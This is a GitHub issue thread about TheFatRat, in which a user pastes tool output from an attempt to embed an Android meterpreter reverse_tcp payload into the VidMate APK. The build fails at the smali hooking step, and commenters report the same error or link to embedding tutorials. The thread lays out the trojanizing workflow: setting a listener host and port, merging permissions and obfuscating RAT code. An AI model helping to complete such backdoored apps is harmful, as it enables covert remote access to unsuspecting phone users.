### ISSUE TITLE
Failed to locate smali file to hook.

### ISSUE THREAD

**Issue by aungsoehein** [Screetsec/TheFatRat#345]
Set LHOST IP: 192.168.8.120
 
  Set LPORT: 4444

 

 Enter the path to your android app/game .(ex: /root/downloads/myapp.apk)

 Path : /root/Downloads/Android-App/VidMate.apk

   +-------------------------------------------+
   | [ 1 ] android/meterpreter/reverse_http    |
   | [ 2 ] android/meterpreter/reverse_https   |
   | [ 3 ] android/meterpreter/reverse_tcp     |
   | [ 4 ] android/shell/reverse_http          |
   | [ 5 ] android/shell/reverse_https         |
   | [ 6 ] android/shell/reverse_tcp           |
   +-------------------------------------------+

   Choose Payload : 3

[ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++    ]
 +------------------------------+
 | [ 1 ] Use Backdoor-apk 0.2.2 |
 | [ 2 ] Use old Fatrat method  |
 +------------------------------+

 Select Tool to create apk : 1

[ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]$ 
  Generate Backdoor
  +------------++-------------------------++-----------------------+
  | Name       ||  Descript   	          || Your Input
  +------------++-------------------------++-----------------------+
  | LHOST      ||  The Listen Addres      || 192.168.8.120
  | LPORT      ||  The Listen Ports       || 4444
  | OUTPUTNAME ||  The Filename output    || app_backdoor.apk
  | PAYLOAD    ||  Payload To Be Used     || android/meterpreter/reverse_tcp
  +------------++-------------------------++-----------------------+

 
[*] Creating RAT Apk File...done.
 
[*] Decompiling RAT APK file...done.
 
[*] Decompiling original APK file...done.
 
[*] Merging permissions of original and payload projects...done.
 
[*] Running proguard on RAT APK file...done.
 
[*] Decompiling obfuscated RAT APK file...done.
 
[*] Creating new directories in original project for RAT smali files...done.
 
[*] Copying RAT smali files to new directories in original project...done.
 
[*] Fixing RAT smali files...done.
 
[*] Obfuscating const-string values in RAT smali files...done.
 
[*] Locating smali file to hook in original project...grep: android.intent.category.LAUNCHER: No such file or directory
grep: android.intent.category.LAUNCHER: No such file or directory
grep: android.intent.action.MAIN: No such file or directory
grep: android.intent.category.LAUNCHER: No such file or directory
grep: android.intent.action.MAIN: No such file or directory
done.
 [!] Failed to locate smali file to hook

I tried many way. But I don't get it till now. pls solve my problem

**Comment by Darkshadow1999vampire** [comment]
i'm facing the same problem. please help

**Comment by mrgenius000** [comment]
check for how to embed payload in orignal apk....
https://www.youtube.com/watch?v=zvdQKR8vQ48

**Comment by peterpt** [comment]
fatrat apk backdoor is outdated (broken) , my will was to remove them from fatrat , but i am a colaborator witch i dont have permission from Edo to do that .
Also , apk backdoor is still in use because they work with very old apks , new ones forget it because there is nothing we can do .

**Comment by hoko-dail** [comment]
[*] Failed to locate smali file to hook
